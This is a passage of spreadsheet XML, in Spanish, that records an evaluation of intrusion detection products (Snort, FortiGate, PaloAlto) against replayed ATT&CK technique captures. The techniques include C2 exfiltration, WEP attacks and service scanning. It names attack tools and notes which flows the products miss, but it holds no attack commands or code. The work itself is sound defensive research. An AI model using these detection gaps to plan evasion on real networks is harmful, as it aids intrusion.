      <t xml:space="preserve"> FortiGate detecta el establecimiento del canal C&amp;C, pero no detecta la programación de la extracción como tal. Por ello, sólo puede considerarse que FortiGate detecta adecuadamente el ataque colateral pero no el principal.                                                        </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>Flujos Detectados FG</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b val="0"/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>: dos flujos con protocolo BROWSER (Windows) no son detectados. Estos flujos son irrelevantes para el ataques</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <color rgb="FF34A853"/>
        <sz val="14.0"/>
      </rPr>
      <t>9999</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <color theme="1"/>
        <sz val="14.0"/>
      </rPr>
      <t xml:space="preserve">, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <color rgb="FF34A853"/>
        <sz val="14.0"/>
      </rPr>
      <t>85585</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <color theme="1"/>
        <sz val="14.0"/>
      </rPr>
      <t>, 94634</t>
    </r>
  </si>
  <si>
    <t>85585, 94634</t>
  </si>
  <si>
    <t>9999, 85585</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <b/>
        <color theme="1"/>
        <sz val="14.0"/>
      </rPr>
      <t>Ataques Colaterales:</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <color theme="1"/>
        <sz val="14.0"/>
      </rPr>
      <t xml:space="preserve"> PaloAlto detecta el uso de Covenant como herramienta de C2. Además, detecta los mensajes beacon correspondientes a Covenant . Los flujos no contarán para el calculo de la capacidad de deteccion porque no detecta la transferencia programada    </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <b/>
        <color theme="1"/>
        <sz val="14.0"/>
      </rPr>
      <t xml:space="preserve">Flujos Detectados PA: </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <color theme="1"/>
        <sz val="14.0"/>
      </rPr>
      <t>PaloAlto no detecta los flujos correspondientes al protocolo BROWSER, SSDP</t>
    </r>
  </si>
  <si>
    <t>Data Transfer Size Limits</t>
  </si>
  <si>
    <t>T1030</t>
  </si>
  <si>
    <t>Dividir archivos para realizar transferencias menores a un umbral que provoque alertas</t>
  </si>
  <si>
    <t>ftp, split</t>
  </si>
  <si>
    <t>T1030-Transfer_Size_Limits_[5].pcapng</t>
  </si>
  <si>
    <t>FTP</t>
  </si>
  <si>
    <t>En el proceso de ataque se hace uso de un Shell Remoto, pero no es la función principal</t>
  </si>
  <si>
    <t>NO**</t>
  </si>
  <si>
    <t>Dependiendo la forma en la que se envien los archivos, puede ser indetectable. Sin embargo, si utiliza protocolos de transferencia de ficheros (FTP,SMB...) resulta importante monitorizar transferencias con un mismo tamaño de manera concurrente</t>
  </si>
  <si>
    <t>Transferencia de ficheros mediante FTP, previamente divididos en paquetes de un tamaño constante</t>
  </si>
  <si>
    <t>Manual [5] /  4.9.1</t>
  </si>
  <si>
    <t>Manual [5] / C.1</t>
  </si>
  <si>
    <t>Manual [5] /  5.12.5</t>
  </si>
  <si>
    <t>La división en partes para la transferencia de un fichero no necesariamente es un ataque</t>
  </si>
  <si>
    <t>2002752, 2002749, 2000418, 2011803, 2003303, 2003410, 2015016, 2036752</t>
  </si>
  <si>
    <t>2000418, 2011803, 2003303, 2003410, 2015016, 2036752</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <b/>
        <color theme="1"/>
        <sz val="14.0"/>
      </rPr>
      <t>Flujos detectados PA</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <color theme="1"/>
        <sz val="14.0"/>
      </rPr>
      <t>:  PaloAlto no detecta flujos correspondientes al protocolo MDNS</t>
    </r>
  </si>
  <si>
    <t>System Owner</t>
  </si>
  <si>
    <t>T1033</t>
  </si>
  <si>
    <t>Descubrimiento de sesión de usuario en equipo remoto</t>
  </si>
  <si>
    <t>quser, qwinsta</t>
  </si>
  <si>
    <t>T1033-System_owner_[4].pcapng</t>
  </si>
  <si>
    <t>Regla que detecte múltiples interacciones con la API LSM_API_service del servicio RPC desde el mismo equipo origen.</t>
  </si>
  <si>
    <t>Manual [4] /  3.12</t>
  </si>
  <si>
    <t>Manual [4] / B.12</t>
  </si>
  <si>
    <t>Manual [4] / 4.12</t>
  </si>
  <si>
    <t>El descubrimiento de sesión del usuario en un equipo remoto puede tratarse de una actividad legítima en ciertos contextos</t>
  </si>
  <si>
    <t>44489, 2002752, 2002749, 2044666, 2051116</t>
  </si>
  <si>
    <t>44489, 2044666, 2051116</t>
  </si>
  <si>
    <t>2002749, 2002752</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>Flujos Detectados FG:</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b val="0"/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t xml:space="preserve"> FortiGate no identifica los flujos con direcciones IPv6, causando esta variación en los resultados</t>
    </r>
  </si>
  <si>
    <t>92322, 33836</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <b/>
        <color theme="1"/>
        <sz val="14.0"/>
      </rPr>
      <t>Flujos detectados PA</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <color theme="1"/>
        <sz val="14.0"/>
      </rPr>
      <t xml:space="preserve">: Paloalto no detecta tráfico de los protocolos MDNS y LLMNR </t>
    </r>
  </si>
  <si>
    <t>Collection</t>
  </si>
  <si>
    <t>TA0009</t>
  </si>
  <si>
    <t>Data from Network Shared Drive</t>
  </si>
  <si>
    <t>T1039</t>
  </si>
  <si>
    <t>Descarga de archivos de interés disponibles en una red compartida</t>
  </si>
  <si>
    <t>Comando Net Use</t>
  </si>
  <si>
    <t>T1039-Data_from_network_shared_drive_[4].pcapng</t>
  </si>
  <si>
    <t>Detección por anomalías, copia repentina de ficheros compartidos por red.</t>
  </si>
  <si>
    <t>Manual [4] /  3.15</t>
  </si>
  <si>
    <t>Manual [4] / B.15</t>
  </si>
  <si>
    <t>Manual [4] / 4.15</t>
  </si>
  <si>
    <t>La extracción de datos de un disco compartido es legítimo en según qué contextos</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>44489, 2002752, 2002749, 2044666</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2051116</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>44489, 2044666</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2051116</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>44489, 2002752, 2002749, 2044666</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2051116</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>44489, 2002752, 2002749, 2044666</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2051116</t>
    </r>
  </si>
  <si>
    <t>FTP - File Sharing</t>
  </si>
  <si>
    <t>1</t>
  </si>
  <si>
    <t>Network Sniffing</t>
  </si>
  <si>
    <t>T1040</t>
  </si>
  <si>
    <t>Falsa autenticación</t>
  </si>
  <si>
    <t>Suite aircrack-ng</t>
  </si>
  <si>
    <t>T1040-Autenticacion_[1].pcapng</t>
  </si>
  <si>
    <t>802.11</t>
  </si>
  <si>
    <t>No existe detección posible ante este tipo de ataques. El uso de cifrado WEP incorpora vulnerabilidades intrínsecas a este.</t>
  </si>
  <si>
    <t>Manual [1] /  4.2.1</t>
  </si>
  <si>
    <t>Manual [1] / E.20</t>
  </si>
  <si>
    <t>Manual [4] / 4.1.26</t>
  </si>
  <si>
    <t>NO (Ataque de L2)</t>
  </si>
  <si>
    <t>SI (paquetes con tamaño 0)</t>
  </si>
  <si>
    <t>El acceso vía falsa autenticación siempre es un ataque</t>
  </si>
  <si>
    <t>L2 (WEP)</t>
  </si>
  <si>
    <t>Error TCPReplay. No se puede analizar el fichero</t>
  </si>
  <si>
    <t>ChopChop</t>
  </si>
  <si>
    <t>T1040-Chopchop_[1].pcapng</t>
  </si>
  <si>
    <t>Manual [1] /  4.2.2</t>
  </si>
  <si>
    <t>Manual [1] / E.21</t>
  </si>
  <si>
    <t>Manual [4] / 4.1.27</t>
  </si>
  <si>
    <t>El uso de la técnica ChopChop siempre es un ataque</t>
  </si>
  <si>
    <t>Fragmentación</t>
  </si>
  <si>
    <t>T1040-Fragmentacion_[1].pcapng</t>
  </si>
  <si>
    <t>Manual [1] /  4.2.3</t>
  </si>
  <si>
    <t>Manual [1] / E.22</t>
  </si>
  <si>
    <t>Manual [4] / 4.1.28</t>
  </si>
  <si>
    <t>El uso de la técnica Fragmentacion siempre es un ataque</t>
  </si>
  <si>
    <t>Inundación MAC</t>
  </si>
  <si>
    <t>T1040-Mac_flood_[1].pcapng</t>
  </si>
  <si>
    <t>IPv4</t>
  </si>
  <si>
    <t>NO*</t>
  </si>
  <si>
    <t>Regla personalizada que detecte un envío masivo de mensajes IPv4 con direcciones incorreladas con la red a proteger, y que aparenten ser completamente aleatorias</t>
  </si>
  <si>
    <t>Manual [1] /  3.2</t>
  </si>
  <si>
    <t>Manual [1] / E.1</t>
  </si>
  <si>
    <t>Manual [4] / 4.1.29</t>
  </si>
  <si>
    <t>Una inundacion MAC siempre es un ataque</t>
  </si>
  <si>
    <t>L2 (Switch)</t>
  </si>
  <si>
    <t>2013028, 50447</t>
  </si>
  <si>
    <t>50447, 2002749, 2100528, 2002752, 2013028, 2002824</t>
  </si>
  <si>
    <t>50447, 2100528, 2013028, 2002824</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>Flujos Detectados Snort</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>: Snortv3 y tranalyzer cuentan los flujos IPv4 como flujos válidos, no así Snortv2, que no los analiza. Snortv2 tan sólo analiza un flujo TCP suelto en la captura. Esto sí puede afectar a los resultados.</t>
    </r>
  </si>
  <si>
    <t>Exfiltration Over C2 Channel</t>
  </si>
  <si>
    <t>T1041</t>
  </si>
  <si>
    <t>Exfiltración por canal C2</t>
  </si>
  <si>
    <t>Caldera</t>
  </si>
  <si>
    <t>T1041-exfiltration_over_c2_channel_[3].pcapng</t>
  </si>
  <si>
    <t>Detección por anomalías basada en la sospecha de una extracción de información confidencial por un posible canal C2</t>
  </si>
  <si>
    <t>Manual [3] /  3.8.14</t>
  </si>
  <si>
    <t>Manual [3] / 3.8.14.4</t>
  </si>
  <si>
    <t>Manual [3] / 3.8.14.5</t>
  </si>
  <si>
    <t>La exfiltración de datos por un canal C2 siempre es un ataque</t>
  </si>
  <si>
    <t>2043217, 2034567, 2013028, 2016992</t>
  </si>
  <si>
    <t>2034567, 2013028, 2016992</t>
  </si>
  <si>
    <t>50447, 2043217, 2034567, 2013028, 2016992</t>
  </si>
  <si>
    <t>50447, 2034567, 2013028, 2016992</t>
  </si>
  <si>
    <t>2002752, 2002749, 2006409, 2043217, 2034567, 2013028, 2016992, 2002824, 50447</t>
  </si>
  <si>
    <t>2006409, 2043217, 2034567, 2013028, 2016992, 2002824, 50447</t>
  </si>
  <si>
    <t>2002752, 2002749, 2006409, 2034567, 2013028, 2016992, 2002824, 50447</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t xml:space="preserve">Flujos Detectados FG: </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b val="0"/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t xml:space="preserve">hay un flujo que FortiGate no detecta. No hay causa aparente </t>
    </r>
  </si>
  <si>
    <t>Web Browsing - Able to transfer file</t>
  </si>
  <si>
    <t>Network Service Discovery</t>
  </si>
  <si>
    <t>T1046</t>
  </si>
  <si>
    <t>Mútliples actividades de escaneo, incluidas el intento de Shell Remoto aprovechando el conocimiento de la red victima</t>
  </si>
  <si>
    <t>Low Orbit Ion Canon (LOIC) for UDP, TCP, or HTTP requests</t>
  </si>
  <si>
    <t>T1046-C2018_[6].pcapng</t>
  </si>
  <si>
    <t>Shell Remoto - T1071</t>
  </si>
  <si>
    <t>En determinadas circunstancias, si el envío de paquetes constituye una amenaza de denegación de servicio, podría detectarse el envío masivo de paquetes</t>
  </si>
  <si>
    <t>Dataset CIC-2018</t>
  </si>
  <si>
    <t>Manual [4] / B.31</t>
  </si>
  <si>
    <t>Las actividades de escaneo son ataques</t>
  </si>
  <si>
    <t>2035480, 2025644</t>
  </si>
  <si>
    <t>2035480, 2025644, 44728</t>
  </si>
  <si>
    <t>2002749, 2002752, 2035480, 2000419, 2025644, 44728</t>
  </si>
  <si>
    <t>2035480, 2000419, 2025644, 44728</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>Flujos Detectados Snort</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>: la diferencia en los números de flujos detectados se debe puramente al método de identificación de flujos (no hay pérdida de información)</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t xml:space="preserve">Ataques Colaterales: </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b val="0"/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>FortiGate detecta el uso de comandos de forma remota, aunque esto se trata de una acción meramente residual, que no está relacionada con la naturaleza del ataque.</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <b/>
        <color theme="1"/>
        <sz val="14.0"/>
      </rPr>
      <t>Ataques colaterales</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <color theme="1"/>
        <sz val="14.0"/>
      </rPr>
      <t>: Detección de Metasploit Meterpreter conexión.</t>
    </r>
  </si>
  <si>
    <t>Descubrimiento de servicios y version</t>
  </si>
  <si>
    <t>Nikto</t>
  </si>
  <si>
    <t>T1046-Version_services_detection1_[3].pcapng</t>
  </si>
  <si>
    <t>Múltiples mecanismos. Por ejemplo, regla que detecte un escaneo de puertos (alto número de peticiones hacia un rango de puertos en poco tiempo)</t>
  </si>
  <si>
    <t>Manual [3] /  3.8.3</t>
  </si>
  <si>
    <t>Manual [3] / 3.8.3.4</t>
  </si>
  <si>
    <t>Manual [3] / 3.8.3.5</t>
  </si>
  <si>
    <t>El descubrimiento de servicios y versiones se considera como ataque</t>
  </si>
  <si>
    <t>1071, 1242, 1131, 1130, 1044, 1129, 987, 1245, 977, 971, 1880, 1852, 1145, 2056, 913, 914, 912, 985, 1400, 962, 1288, 853, 2152, 1738, 1875, 1301, 2002, 918, 999, 1000, 993, 1486, 1172, 857, 1284, 3201, 986, 1256, 1016, 1826, 1482, 1567, 1568, 1772, 2076, 1080, 1128, 1076, 1492, 1493, 1560, 2565, 1146, 1848, 1148, 1125, 1166, 1286, 1660, 1765, 1528, 1164, 2484, 903, 1551, 2228, 1402, 1150, 1576, 1152, 1580, 1153, 1154, 2062, 1048, 1103, 1586, 1577, 1578, 1579, 931, 2246, 1587, 1122, 1002, 992, 1401, 875, 1829, 911, 1244, 966, 906, 928, 1773, 1517, 1147, 2154, 1491, 1611, 2000, 1157, 1828, 1376, 2077, 1827, 1231, 1767, 1774, 1834, 1667, 2347, 2346, 1835, 1998, 882, 922, 1659, 1877, 1212, 910, 930, 1722, 1108, 915, 935, 1141, 1163, 2060, 1173, 1544, 936, 1230, 1742, 1743, 1540, 1250, 2138, 1168, 1407, 1385, 1564, 805, 1726, 940, 937, 952, 967, 1248, 955, 958, 961, 965, 1847, 1175, 1111, 1592, 43290, 1481, 1521, 1201, 1123, 1183, 1160, 1500, 1013, 807, 1193, 979, 1023, 1024, 1487, 1018, 2325, 1162, 1134, 1213, 904, 932, 907, 905, 1214, 1215, 1192, 1155, 1556, 1161, 1202, 1030, 1040, 887, 878, 1038, 1022, 1077, 1078, 946, 1075, 984, 1073, 851, 1127, 844, 1585, 1584, 1582, 1151, 1575, 1583, 1581, 2148, 2151, 2144, 1458, 2137, 2397, 1525, 2215, 2223, 1787, 1724, 43289, 2204, 2205, 2206, 1637, 1142, 2073, 2225, 2130, 2131, 1997, 2214, 1037, 2085, 2219, 2133, 1434, 1433, 1872, 1874, 839, 941, 945, 879, 950, 1542, 944, 943, 980, 942, 947, 968, 956, 949, 957, 990, 953, 951, 959, 964, 2447, 1005, 1559, 1119, 1120, 908, 1816, 1614, 2395, 1871, 2326, 2196, 954, 948, 1851, 1110, 1489, 818, 1032, 1043, 1033, 1034, 1035, 1036, 1031, 2142, 1527, 1526, 902, 2198, 1520, 1209, 1557, 1555, 1770, 1769, 1873, 1522, 1523, 1004, 895, 2393, 2276, 2295, 1671, 2363, 1399, 1091, 2285, 2140, 2410, 886, 2281, 2288, 2298, 1254, 43285</t>
  </si>
  <si>
    <t>1071, 1242, 1131, 1130, 1044, 1129, 987, 1245, 977, 971, 1880, 1852, 1145, 2056, 913, 914, 912, 985, 1400, 962, 1288, 853, 2152, 1738, 1875, 1301, 2002, 918, 999, 1000, 993, 1486, 1172, 857, 1284, 3201, 986, 1256, 1016, 1826, 1482, 1567, 1568, 1772, 2076, 1080, 1128, 1076, 1492, 1493, 1560, 2565, 1146, 1848, 1148, 1125, 1166, 1286, 1660, 1765, 1528, 1164, 2484, 903, 1551, 2228, 1402, 1150, 1576, 1152, 1580, 1153, 1154, 2062, 1048, 1103, 1586, 1577, 1578, 1579, 931, 2246, 1587, 1122, 1002, 992, 1401, 875, 1829, 911, 1244, 966, 906, 928, 1773, 1517, 1147, 2154, 1491, 1611, 2000, 1157, 1828, 1376, 2077, 1827, 1231, 1767, 1774, 1834, 1667, 2347, 2346, 1835, 1998, 882, 922, 1659, 1877, 1212, 910, 930, 1722, 1108, 915, 935, 1141, 1163, 2060, 1173, 1544, 936, 1230, 1742, 1743, 1540, 1250, 2138, 1168, 1407, 1385, 1564, 805, 1726, 940, 937, 952, 967, 1248, 955, 958, 961, 965, 1847, 1175, 1111, 1592, 43290, 1481, 1521, 1201, 1123, 1183, 1160, 1500, 1013, 807, 1193, 979, 1023, 1024, 1487, 1018, 2325, 1162, 1134, 1213, 904, 932, 907, 905, 1214, 1215, 1192, 1155, 1556, 1161, 1202, 1030, 1040, 887, 878, 1038, 1022, 1077, 1078, 946, 1075, 984, 1073, 851, 1127, 844, 1585, 1584, 1582, 1151, 1575, 1583, 1581, 2148, 2151, 2144, 1458, 2137, 2397, 1525, 2215, 2223, 1787, 1724, 43289, 2204, 2205, 2206, 1637, 1142, 2073, 2225, 2130, 2131, 1997, 2214, 1037, 2085, 2219, 2133, 1434, 1433, 1872, 1874, 839, 941, 945, 879, 950, 1542, 944, 943, 980, 942, 947, 968, 956, 949, 957, 990, 953, 951, 959, 964, 2447, 1005, 1559, 1119, 1120, 908, 1816, 1614, 2395, 1871, 2326, 2196, 954, 948, 1851, 1110, 1489, 818, 1032, 1043, 1033, 1034, 1035, 1036, 1031, 2142, 1527, 1526, 902, 2198, 1520, 1209, 1557, 1555, 1770, 1769, 1873, 1522, 1523, 1004, 895, 2393, 2276, 2295, 1671, 2363, 1399, 1091, 2285, 2140, 2410, 886, 2281, 2288, 2298, 1254, 43285, 2002677, 2101071, 2101242, 2027262, 2016141, 2101129, 2100987, 2027265, 2027250, 2018752, 2027263, 2101245, 2027253, 2101145, 2010766, 2100993, 2101256, 2101016, 2019714, 2101402, 2049400, 2009362, 2009361, 2101401, 2030337, 2101244, 2049401, 2011042, 2010963, 2006446, 2006445, 2009714, 2019526, 2101877, 2101108, 2016184, 2100952, 2100977, 2100958, 2100961, 2100965, 2011141, 2011144, 2011142, 2011143, 2021390, 2101201, 2101013, 2101487, 2101018, 2009485, 2102073, 2049402, 2101874, 2100953, 2100951, 2100959, 2100981, 2100982, 2101403, 2016182, 2011696, 2011564, 2009317, 2009318, 2010920, 2009931, 2010475, 2012795, 2009384, 2009391, 2009369, 2012369, 2002879, 2010485, 2008897, 2017442, 2010260, 2009933, 2012013, 2009051, 2010354, 2008833, 2010355, 2009892, 2009316, 2010197, 2010276, 2010466, 2017441, 2010362, 2010473, 2009932, 2011274, 2010124, 2010564, 2010125, 2011384, 2011259, 2017440, 2010484, 2009887, 2009325, 2009326, 2009229, 2009071, 2019524, 2002901, 2014180, 2010254, 2017436</t>
  </si>
  <si>
    <t xml:space="preserve">2002677, 2101071, 2101242, 2027262, 2016141, 2101129, 2100987, 2027265, 2027250, 2018752, 2027263, 2101245, 2027253, 2101145, 2010766, 2100993, 2101256, 2101016, 2019714, 2101402, 2049400, 2009362, 2009361, 2101401, 2030337, 2101244, 2049401, 2011042, 2010963, 2006446, 2006445, 2009714, 2019526, 2101877, 2101108, 2016184, 2100952, 2100977, 2100958, 2100961, 2100965, 2011141, 2011144, 2011142, 2011143, 2021390, 2101201, 2101013, 2101487, 2101018, 2009485, 2102073, 2049402, 2101874, 2100953, 2100951, 2100959, 2100981, 2100982, 2101403, 2016182, 2011696, 2011564, 2009317, 2009318, 2010920, 2009931, 2010475, 2012795, 2009384, 2009391, 2009369, 2012369, 2002879, 2010485, 2008897, 2017442, 2010260, 2009933, 2012013, 2009051, 2010354, 2008833, 2010355, 2009892, 2009316, 2010197, 2010276, 2010466, 2017441, 2010362, 2010473, 2009932, 2011274, 2010124, 2010564, 2010125, 2011384, 2011259, 2017440, 2010484, 2009887, 2009325, 2009326, 2009229, 2009071, 2019524, 2002901, 2014180, 2010254, 2017436, 43238, 50447, 1071, 1242, 1131, 1130, 1044, 1129, 987, 41188, 20173, 1245, 977, 971, 41187, 1880, 1852, 1145, 300003, 18742, 2056, 913, 914, 912, 41742, 985, 1400, 962, 1288, 853, 2152, 1738, 1875, 1301, 2002, 8492, 918, 43808, 999, 1000, 993, 1486, 1172, 857, 1284, 3201, 986, 1256, 24342, 1016, 1826, 1482, 1567, 1568, 1772, 2076, 1080, 39348, 1128, 1076, 1492, 1493, 1560, 2565, 53017, 1146, 1848, 1148, 1125, 1166, 1286, 1660, 1765, 1528, 1164, 2484, 903, 1551, 2228, 1402, 1150, 1576, 1152, 1580, 1153, 1154, 2062, 1048, 1103, 56563, 1586, 1577, 1578, 1579, 931, 2246, 1587, 1122, 1002, 992, 1401, 875, 1829, 31940, 911, 1244, 966, 42323, 906, 928, 8493, 1773, 3674, 1517, 45380, 1147, 2154, 1491, 1611, 2000, 1157, 1828, 42465, 1376, 13990, 16431, 31860, 7070, 2077, 20258, 1827, 1231, 20674, 1767, 42289, 1774, 1834, 7071, 1667, 61117, 36037, 2347, 2346, 1835, 1998, 882, 49920, 922, 1659, 1877, 1212, 910, 930, 1722, 1108, 8490, 915, 935, 25975, 1141, 59237, 1163, 2060, 1173, 1544, 936, 1230, 1742, 1743, 38371, 1540, 1250, 2138, 1168, 1407, 1385, 1564, 805, 1726, 940, 937, 952, 967, 1248, 955, 958, 961, 965, 1847, 1175, 1111, 43356, 1592, 43290, 1481, 1521, 1201, 1123, 1183, 1160, 1500, 1013, 807, 1193, 979, 21161, 1023, 1024, 1487, 1018, 2325, 1162, 1134, 1213, 904, 932, 907, 905, 1214, 1215, 1192, 1155, 1556, 1161, 1202, 1030, 1040, 60573, 887, 878, 1038, 1022, 1077, 1078, 946, 1075, 984, 1073, 851, 1127, 50921, 844, 1585, 1584, 1582, 1151, 1575, 1583, 1581, 41189, 2148, 2151, 2144, 1458, 2137, 2397, 1525, 2215, 2223, 1787, 1724, 43289, 2204, 2205, 2206, 1637, 1142, 2073, 2225, 31377, 2130, 2131, 1997, 2214, 1037, 2085, 2219, 2133, 1434, 1433, 1872, 1874, 839, 941, 945, 879, 950, 1542, 944, 943, 980, 942, 947, 968, 956, 949, 957, 990, 953, 951, 959, 964, 2447, 1005, 1559, 55647, 1119, 1120, 908, 1816, 1614, 2395, 1871, 2326, 2196, 954, 948, 1851, 1110, 1489, 818, 1032, 1043, 1033, 1034, 1035, 1036, 1031, 2142, 1527, 1526, 902, 2198, 1520, 1209, 1557, 1555, 1770, 1769, 33613, 33612, 1873, 1522, 1523, 1004, 895, 21515, 2393, 50923, 50924, 50925, 50922, 41817, 2276, 25977, 21516, 59258, 20663, 31360, 59332, 20654, 27218, 2295, 28912, 31637, 20631, 20632, 20633, 27230, 31362, 28957, 27192, 20815, 16613, 27688, 43724, 43691, 20656, 1671, 20728, 20731, 2363, 1399, 31638, 1091, 20651, 20826, 44133, 2285, 2140, 31419, 2410, 886, 2281, 43392, 18478, 27284, 20732, 2288, 2298, 1254, 31568, 24502, 23362, 22097, 22064, 43285
</t>
  </si>
  <si>
    <t xml:space="preserve">2002677, 2101071, 2101242, 2027262, 2016141, 2101129, 2100987, 2027265, 2027250, 2018752, 2027263, 2101245, 2027253, 2101145, 2010766, 2100993, 2101256, 2101016, 2019714, 2101402, 2049400, 2009362, 2009361, 2101401, 2030337, 2101244, 2049401, 2011042, 2010963, 2006446, 2006445, 2009714, 2019526, 2101877, 2101108, 2016184, 2100952, 2100977, 2100958, 2100961, 2100965, 2011141, 2011144, 2011142, 2011143, 2021390, 2101201, 2101013, 2101487, 2101018, 2009485, 2102073, 2049402, 2101874, 2100953, 2100951, 2100959, 2100981, 2100982, 2101403, 2016182, 2011696, 2011564, 2009317, 2009318, 2010920, 2009931, 2010475, 2012795, 2009384, 2009391, 2009369, 2012369, 2002879, 2010485, 2008897, 2017442, 2010260, 2009933, 2012013, 2009051, 2010354, 2008833, 2010355, 2009892, 2009316, 2010197, 2010276, 2010466, 2017441, 2010362, 2010473, 2009932, 2011274, 2010124, 2010564, 2010125, 2011384, 2011259, 2017440, 2010484, 2009887, 2009325, 2009326, 2009229, 2009071, 2019524, 2002901, 2014180, 2010254, 2017436, 43238, 50447, 1071, 1242, 1131, 1130, 1044, 1129, 987, 41188, 20173, 1245, 977, 971, 41187, 1880, 1852, 1145, 300003, 18742, 2056, 913, 914, 912, 41742, 985, 1400, 962, 1288, 853, 2152, 1738, 1875, 1301, 2002, 8492, 918, 43808, 999, 1000, 993, 1486, 1172, 857, 1284, 3201, 986, 1256, 24342, 1016, 1826, 1482, 1567, 1568, 1772, 2076, 1080, 39348, 1128, 1076, 1492, 1493, 1560, 2565, 53017, 1146, 1848, 1148, 1125, 1166, 1286, 1660, 1765, 1528, 1164, 2484, 903, 1551, 2228, 1402, 1150, 1576, 1152, 1580, 1153, 1154, 2062, 1048, 1103, 56563, 1586, 1577, 1578, 1579, 931, 2246, 1587, 1122, 1002, 992, 1401, 875, 1829, 31940, 911, 1244, 966, 42323, 906, 928, 8493, 1773, 3674, 1517, 45380, 1147, 2154, 1491, 1611, 2000, 1157, 1828, 42465, 1376, 13990, 16431, 31860, 7070, 2077, 20258, 1827, 1231, 20674, 1767, 42289, 1774, 1834, 7071, 1667, 61117, 36037, 2347, 2346, 1835, 1998, 882, 49920, 922, 1659, 1877, 1212, 910, 930, 1722, 1108, 8490, 915, 935, 25975, 1141, 59237, 1163, 2060, 1173, 1544, 936, 1230, 1742, 1743, 38371, 1540, 1250, 2138, 1168, 1407, 1385, 1564, 805, 1726, 940, 937, 952, 967, 1248, 955, 958, 961, 965, 1847, 1175, 1111, 43356, 1592, 43290, 1481, 1521, 1201, 1123, 1183, 1160, 1500, 1013, 807, 1193, 979, 21161, 1023, 1024, 1487, 1018, 2325, 1162, 1134, 1213, 904, 932, 907, 905, 1214, 1215, 1192, 1155, 1556, 